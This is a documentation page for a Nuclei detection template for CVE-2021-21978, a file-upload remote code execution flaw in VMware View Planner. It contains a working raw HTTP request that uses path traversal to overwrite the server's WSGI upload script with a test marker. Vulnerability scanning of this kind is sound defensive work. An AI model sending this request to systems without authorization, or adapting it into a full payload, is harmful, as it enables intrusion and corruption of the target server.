VMware View Planner <4.6 SP1- Remote Code Execution
ID: CVE-2021-21978
Severity: critical
Author: dwisiswant0
Tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive
Description
Section titled “Description”VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.An unauthorized attacker with network access to View Planner Harness could upload and execute a specially craftedfile leading to remote code execution within the logupload container.
YAML Source
Section titled “YAML Source”id: CVE-2021-21978
info: name: VMware View Planner <4.6 SP1- Remote Code Execution author: dwisiswant0 severity: critical description: | VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability. reference: - https://twitter.com/osama_hroot/status/1367258907601698816 - https://nvd.nist.gov/vuln/detail/CVE-2021-21978 - https://www.vmware.com/security/advisories/VMSA-2021-0003.html - http://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html - https://github.com/HimmelAward/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21978 cwe-id: CWE-20 epss-score: 0.97475 epss-percentile: 0.99967 cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware product: view_planner tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive
http: - raw: - | POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS Accept: text/html Referer: {{BaseURL}} Connection: close
------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="logfile"; filename="" Content-Type: text/plain
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
matchers-condition: and matchers: - type: dsl dsl: - "len(body) == 28"
- type: word part: body words: - "File uploaded successfully."
- type: status status: - 200# digest: 490a0046304402201bc329123f0c512104b7e01f985b54281d5d49cf66e4689293018bb6cbc2f81c0220745fe525c65964954b65236b928b5c4cd3c29d2456d865d39782589bee350afc:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21978.yaml"